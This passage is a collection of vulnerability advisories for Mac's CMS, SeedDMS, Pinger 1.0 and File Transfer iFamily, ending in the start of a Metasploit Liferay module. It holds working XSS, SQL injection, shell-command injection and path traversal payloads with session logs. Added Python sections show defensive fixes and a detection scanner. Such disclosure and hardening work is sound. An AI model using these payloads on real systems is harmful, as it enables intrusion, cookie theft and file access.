      <td colspan="2"><input type="submit" value="Login"></td>
    </tr>
    <tr>
      <td colspan="2"><br><div id="loginMessage" style="display:
block;">Invalid Username or Password</div></td>
    </tr>
  </tbody></table>
  <br>
  <a
href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
ajaxoutput="#forgotPasswordReturn">
  Enter your email address: <input type="text" name="emailAddress"><br>
  <input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user
with Email address:
test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>



--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105


1.3
The remote sql injection web vulnerability can be exploited by remote
attackers with a privileged application user account and without user
interaction. For security demonstration or to reproduce the
vulnerability, follow the provided information and steps below to
continue.


PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--


PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
select 1,2,3,4,@@version--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
select 1,2,3,4,@@version--%20>
</body></head>
</html>


--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53


--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
should be between 1 and 5
-
5.0.12 'pwnd
This page was created in 1.5665068626404 seconds
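The exception lines above are what string-built SQL looks like when an unexpected value reaches SQLite. As an added example (not the Macs Framework code; Python and an in-memory SQLite table are stand-ins), the following shows the concatenation pattern beside a hardened handler that type-checks `roleId`, binds it as a parameter and returns a generic error instead of the driver's message. The table layout, the function names and the response shape are assumptions; the probe value is the advisory's own `'-1 order by 5--`, and the stand-in table has four columns so that the injected `ORDER BY 5` produces the same class of out-of-range error that the log above shows for a five-column table.

```python
import sqlite3

# Probe value from the advisory's PoC (URL-decoded form of %27-1%20order%20by%205--).
ROLE_ID_PROBE = "'-1 order by 5--"


def make_db():
    """Constructed in-memory stand-in for the roles table (layout assumed).

    Four columns, so an injected ORDER BY 5 is out of range: the same class
    of error the advisory's exception log shows for a five-column table.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE roles (roleId INTEGER PRIMARY KEY, name TEXT, "
                 "description TEXT, active INTEGER)")
    conn.executemany("INSERT INTO roles VALUES (?, ?, ?, ?)", [
        (1, "admin", "full access", 1),
        (2, "editor", "edit pages", 1),
        (3, "guest", "read only", 0),
    ])
    conn.commit()
    return conn


def edit_role_vulnerable(conn, role_id):
    """The pattern behind the advisory: the GET value is spliced into the SQL text."""
    sql = "SELECT * FROM roles WHERE roleId = '" + role_id + "'"
    return conn.execute(sql).fetchall()


def edit_role_fixed(conn, role_id):
    """Hardened form: the id must be an integer and is bound, never concatenated."""
    rid = int(role_id)  # ValueError for anything that is not an integer
    return conn.execute("SELECT * FROM roles WHERE roleId = ?", (rid,)).fetchall()


def handle_edit_role(conn, role_id, lookup):
    """Controller wrapper standing in for the editRole/deleteUser handlers.

    The driver's message is kept for the server-side log only; the client
    gets a generic status, which removes the error-based feedback that the
    advisory's [SQL Error Exception Logs] section shows being exposed.
    """
    try:
        rows = lookup(conn, role_id)
    except ValueError:
        return {"status": 400, "body": "invalid roleId"}
    except sqlite3.Error as exc:
        return {"status": 500, "body": "internal error", "logged": str(exc)}
    return {"status": 200, "body": rows}


if __name__ == "__main__":
    db = make_db()
    print(handle_edit_role(db, "3", edit_role_fixed))
    print(handle_edit_role(db, ROLE_ID_PROBE, edit_role_vulnerable))
    print(handle_edit_role(db, ROLE_ID_PROBE, edit_role_fixed))
```

The integer check is not a substitute for the bound parameter; it is an additional layer that turns a malformed id into a 400 before any SQL is built, and it is the right choice here only because `roleId` and `userId` are numeric keys. For free-text columns the parameter binding alone carries the protection.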


Security Risk:
==============
1.1 & 1.2
The security risk of the client-side cross site scripting web
vulnerabilities in the search and email reset functions is estimated as
medium.

1.3
The security risk of the remote sql injection web vulnerabilities in the
id parameters on delete is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.seeddms.org
# Software Link: https://www.seeddms.org/index.php?id=7
# CVE: N/A

Document Title:
===============
SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2209


Release Date:
=============
2020-04-15


Vulnerability Laboratory ID (VL-ID):
====================================
2209


Common Vulnerability Scoring System:
====================================
4.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
SeedDMS is a free document management system with an easy to use web
based user interface. It is based on PHP and
MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of
development has made it a mature, powerful
and enterprise ready platform for sharing and storing documents. It's
fully compatible with its predecessor LetoDMS.

(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 &
https://www.seeddms.org/index.php?id=7 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application.


Affected Product(s):
====================
Uwe Steinmann
Product: SeedDMS - Content Management System  v4.3.37, v5.0.13, v5.1.14,
v5.1.16, v5.1.18 and v6.0.7


Vulnerability Disclosure Timeline:
==================================
2020-04-15: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent cross-site scripting web vulnerabilities have been discovered
in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application.
The vulnerability allows remote attackers to inject their own malicious script
code with a persistent attack vector, compromising browser-to-web-application
requests from the application side.

The persistent cross-site scripting web vulnerabilities are located in
the `name` and `comment` parameters of the `AddEvent.php` file.
Remote attackers are able to add their own event via op.AddEvent with
malicious script code. The request method used to inject is POST
and the attack vector is located on the application side. After the
injection, the execution occurs in the admin panel within
`Log Management`, in the `Webdav` and `Web` views. The content of the
comment and name is pushed unescaped into the logs with
an html/js template. This allows an attacker with lower privileges to
exploit the issue remotely by a simple POST injection from outside.

Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)

Vulnerable Parameter(s):
[+] name
[+] comment

Affected Module(s):
[+] Log Management (out.LogManagement.php)


Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
with a low-privileged web-application user account and low user interaction.
For a security demonstration, or to reproduce the security web
vulnerability, follow the information and steps provided below.


Manual steps to reproduce the vulnerability ...
1. Start your local web browser and tamper with the HTTP protocol session
2. Open AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments field
4. Save or submit the entry with an error
Note: The web and webdav log has now captured the insert or error
5. Now wait until the administrator previews the web or webdav view
function in the log management
6. Successful reproduction of the persistent web vulnerability!


PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
?logname=20200413.log
Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="<iframe
src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>


PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>


--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&comment=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Injection point via Calendar op.AddEvent Name & Comment



--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Note: Execution Point via Log Management (AP) on Webdav View or Web View



Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=


Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input fields on transmit to sanitize them
2. Filter and restrict the input fields of the name and comment
parameters for special chars to prevent injects
3. Parse (encode) the output location of all web and webdav logfiles to prevent
the execution point
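As an added example (not part of the advisory and not SeedDMS code), the following Python shows the two defensive halves of the fix above: a scanner that parses SeedDMS-style web log lines in the format shown in the PoC and flags markup in the `name` and `comment` parameters, and the output-encoding step a Log Management view needs before a log line reaches the HTML template. The sample log lines, user names and regexes are constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs

# SeedDMS-style web log line (format as shown in the advisory's PoC):
#   "Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name=...&comment=..."
LOG_LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2} \d{2}:\d{2}:\d{2})\s+"
    r"\[(?P<level>\w+)\]\s+(?P<user>\S+)\s+\((?P<host>[^)]*)\)\s+"
    r"(?P<op>\S+)(?:\s+\?(?P<query>.*))?$"
)

# Markup that must never reach an HTML view unencoded: a tag opener,
# a javascript: URL, or an inline event handler such as onload=.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]|javascript\s*:|\bon[a-z]+\s*=", re.I)

# Parameters the advisory identifies as the injection points of op.AddEvent.
WATCHED_PARAMS = ("name", "comment")


def parse_log_line(line):
    """Split one log line into its fields; the query part (after '?') is
    decoded into a {param: [values]} dict. Returns None for unparseable lines."""
    m = LOG_LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    entry = m.groupdict()
    query = entry.pop("query") or ""
    entry["params"] = parse_qs(query, keep_blank_values=True)
    return entry


def flag_markup(entry, watched=WATCHED_PARAMS):
    """Return {param: value} for every watched parameter whose value carries markup."""
    flagged = {}
    for param in watched:
        for value in entry["params"].get(param, []):
            if MARKUP_RE.search(value):
                flagged[param] = value
    return flagged


def scan_log(lines):
    """Detection pass over a log: one finding per line with markup in a watched parameter."""
    findings = []
    for line in lines:
        entry = parse_log_line(line)
        if entry is None:
            continue
        flagged = flag_markup(entry)
        if flagged:
            findings.append({"ts": entry["ts"], "user": entry["user"],
                             "op": entry["op"], "flagged": flagged})
    return findings


def render_log_line(line):
    """Output encoding for the Log Management view: the line is displayed as
    text, so every HTML metacharacter is escaped before it reaches the template."""
    return html.escape(line, quote=True)


# Constructed sample log: two benign entries and one carrying the advisory's payload.
SAMPLE_LOG = [
    "Apr 13 19:20:01  [info] alice (localhost) op.AddEvent "
    "?name=Team meeting&comment=Room 4&from=1586728800&to=1586815199",
    "Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog ?logname=20200413.log",
    "Apr 13 19:29:53  [info] mallory (localhost) op.AddEvent "
    '?name=>"<iframe src=evil.source onload=alert(document.cookie)></iframe>'
    "&comment=<iframe src=evil.source onload=alert(document.cookie)></iframe>"
    "&from=1586728800&to=1586815199",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ts"], finding["user"], finding["op"], sorted(finding["flagged"]))
    print(render_log_line(SAMPLE_LOG[2]))
```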


Security Risk:
==============
The security risk of the persistent cross-site web vulnerabilities in
the SeedDMS web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


# Title: Pinger 1.0 - Remote Code Execution
# Date: 2020-04-13
# Author: Milad Karimi
# Vendor Homepage: https://github.com/wcchandler/pinger
# Software Link: https://github.com/wcchandler/pinger
# Tested on: windows 10 , firefox
# Version: 1.0
# CVE : N/A

================================================================================
Pinger 1.0 - Simple Pinging Webapp Remote Code Execution
================================================================================
# Description:
Simple, easy to use jQuery frontend to a PHP backend that pings various
devices and changes colors from green to red depending on whether a device is
up or down.

# PoC :

http://localhost/pinger/ping.php?ping=;echo '<?php phpinfo(); ?>' >info.php
http://localhost/pinger/ping.php?socket=;echo '<?php phpinfo(); ?>' >info.php


# Vulnerable code (ping.php):

    <?php
    // Both branches below concatenate a raw $_GET value into a shell command line
    if(isset($_GET['ping'])){
      // if this is ever noticably slower, i'll pass it stuff when called
      // change the good.xml to config.xml, good is what I use at $WORK
      $xml = simplexml_load_file("config.xml");
      //$xml = simplexml_load_file("good.xml");
      if($_GET['ping'] == ""){
        $host = "127.0.0.1";
      }else{
        $host = $_GET['ping'];
      }
      // Injection point: $host is taken straight from the ping parameter and
      // concatenated into the shell command without escapeshellarg()
      $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout
                  .' '.$host.' | grep received | awk \'{print $4}\''));
      $id = str_replace('.','_',$host);

      if(($out == "1") || ($out == "0")){
        echo json_encode(array("id"=>"h$id","res"=>"$out"));
      }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
      }
    }

    if(isset($_GET['socket'])){
      $xml = simplexml_load_file("config.xml");
      //$xml = simplexml_load_file("good.xml");
      if($_GET['socket'] == ""){
        $host = "127.0.0.1 80";
      }else{
        $host = str_replace(':',' ',$_GET['socket']);
      }
      // Injection point: the socket parameter reaches the nc command line unescaped
      $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1');
      $id = str_replace('.','_',$host);
      $id = str_replace(' ','_',$id);
      if(preg_match("/succeeded/",$out)){
        echo json_encode(array("id"=>"h$id","res"=>"1"));
      }else{
        ## if it returns nothing, assume network is messed up
        echo json_encode(array("id"=>"h$id","res"=>"0"));
      }
    }

    ?>
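As an added example (not the project's code), here is the input handling a hardened ping backend needs, written in Python: host and host:port values are validated against a strict grammar and the ping and nc commands are built as argument vectors for a shell-free subprocess call, so the `;echo ... >info.php` value from the PoC is rejected before any command line exists. The integer timeout parameter (standing in for `$xml->backend->timeout`) and the helper names are assumptions for this example.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_host(host):
    """Return host if it is an IP address or a syntactically valid hostname.
    Anything else (shell metacharacters, spaces, empty string) raises
    ValueError, which is where the PoC value ';echo ... >info.php' is stopped."""
    host = host.strip()
    if not host:
        raise ValueError("empty host")
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError("invalid host: %r" % host)


def parse_socket(spec):
    """Split 'host:port' into a validated (host, port) pair; port must be 1..65535."""
    host, sep, port = spec.rpartition(":")
    if not sep or not port.isdigit() or not 1 <= int(port) <= 65535:
        raise ValueError("invalid socket spec: %r" % spec)
    return validate_host(host), int(port)


def _check_timeout(timeout):
    if not isinstance(timeout, int) or timeout <= 0:
        raise ValueError("timeout must be a positive integer")


def build_ping_argv(host, timeout):
    """Argument-vector equivalent of the original shell_exec('ping -n -q -c 1 -w ...').
    The grep/awk pipe is dropped; the reply count is read from ping's output instead."""
    _check_timeout(timeout)
    return ["ping", "-n", "-q", "-c", "1", "-w", str(timeout), validate_host(host)]


def build_nc_argv(spec, timeout):
    """Argument-vector equivalent of shell_exec('nc -v -z -w <timeout> <host> <port>')."""
    _check_timeout(timeout)
    host, port = parse_socket(spec)
    return ["nc", "-v", "-z", "-w", str(timeout), host, str(port)]


def host_id(host):
    """Same element id scheme as the original: 'h' + host with separators as underscores."""
    return "h" + host.replace(".", "_").replace(":", "_").replace(" ", "_")


def ping_result(host, timeout=1):
    """Run ping without a shell and return '1' or '0' like the original JSON 'res' field."""
    argv = build_ping_argv(host, timeout)          # raises before anything runs on bad input
    proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout + 5)
    received = re.search(r"(\d+) (?:packets )?received", proc.stdout)
    return "1" if received and received.group(1) == "1" else "0"
```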
            
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199


Release Date:
=============
2020-04-14


Vulnerability Laboratory ID (VL-ID):
====================================
2199


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
Directory- or Path-Traversal


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A
complete application to exchange files
wirelessly between devices. It uses the Multipeer Connectivity Framework
to search and connect to available devices,
without the need of internet connection or any kind of server and database.

(Copy of the Homepage:
https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575
)


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a directory
traversal web vulnerability in the official File Transfer iFamily v2.1
iOS mobile application.


Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application


Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official File Transfer iFamily v2.1 iOS mobile application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are, for example, able to
request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main
application path request performed via the GET method. Attackers are
able to request, for example, the local ./etc/ path of the web-server by
changing the local path in the performed request itself.
In a first request the attacker changes the path, and the host redirects to
complete the address with "..". Then the attacker just
attaches a final slash to the request and the path can be accessed via
web-browser to download local files.

Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.


Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the Wi-Fi interface in a local network, without user interaction.
For a security demonstration, or to reproduce the security vulnerability,
follow the information and steps provided below.


PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../


--- PoC Session Logs [GET] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- add slash to correct host address (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
- Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521


Solution - Fix & Patch:
=======================
The vulnerability can be patched by restricting the visible and
accessible ./etc/ path in the app container.
Disallow path changes in the client-side GET method requests and
validate them securely.
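As an added example (not the app's code), the following Python shows the server-side check the fix above calls for: each requested path is percent-decoded, resolved against the document root, and only served if it still lies inside that root, so both PoC forms (the long `../` chain and the `//../` variant) are refused. The document root and the function names are assumptions for this example.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical document root of the app's embedded web server.
DOC_ROOT = "/var/app/www"


def resolve_request_path(root, request_path):
    """Map a URL path onto a filesystem path under root.

    Returns the absolute path to serve, or None when the request must be
    refused: NUL bytes, a literal or percent-encoded '..' segment, or any
    result that does not stay inside root. Stripping every leading slash
    before joining is what defuses the '//../' form from the PoC.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:
        return None
    # Defense in depth: refuse any '..' segment outright, even one that would
    # normalise back inside root (e.g. '/photos/../index.html').
    if any(seg == ".." for seg in decoded.split("/")):
        return None
    relative = decoded.lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    root_norm = posixpath.normpath(root)
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


def classify_request(root, request_path):
    """Label a request for the access log: 'serve' or 'refused:traversal'."""
    if resolve_request_path(root, request_path) is None:
        return "refused:traversal"
    return "serve"
```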


Security Risk:
==============
The security risk of the directory traversal web vulnerability in the
iOS mobile application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader
  include Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Liferay Portal Java Unmarshalling via JSONWS RCE',
      'Description'    => %q{
        This module exploits a Java unmarshalling vulnerability via JSONWS in
        Liferay Portal versions < 6.2.5 GA6, 7.0.6 GA7, 7.1.3 GA4, and 7.2.1 GA2
        to execute code as the Liferay user. Tested against 7.2.0 GA1.
      },
      'Author'         => [
        'Markus Wulftange', # Discovery
        'Thomas Etrillard', # PoC
        'wvu'               # Module
      ],
      'References'     => [
        ['CVE', '2020-7961'],
        ['URL', 'https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html'],
        ['URL', 'https://www.synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html'],
